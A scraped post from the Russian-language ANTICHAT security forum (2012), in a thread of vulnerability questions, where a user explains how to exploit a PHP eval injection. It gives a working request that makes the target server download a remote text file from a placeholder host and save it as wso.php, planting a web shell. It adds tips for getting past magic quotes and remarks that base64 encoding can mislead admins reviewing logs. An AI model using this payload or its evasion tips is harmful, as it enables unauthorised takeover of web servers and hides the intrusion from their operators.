Ваши вопросы по уязвимостям.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

18.11.2012, 20:07

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от Pirotexnik

Pirotexnik said:
После eval пробела быть не должно.
щито? eval - выполняет
PHP
код!
Юзай например так:
Эта функция скопирует
текствовый
файл с сервера, и сохранит его рядом с test.php под именем wso.php
Обрати внимание, MQ должно быть off, иначе кавычки проэкранируются. Тогда нужно будет юзать base64.

не обязательно юзать base64 если хочется видеть читабельный вид для глаза, то можно сделать так:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]test[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]])&[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.com/you_wso.TXT&b=wso.php[/COLOR][/COLOR]

а чтобы обойти MQ можно в мини шеле заюзать stripslashes()

но опять же если юзать base64 то просматривающего админом логи смогут завести его в заблуждение)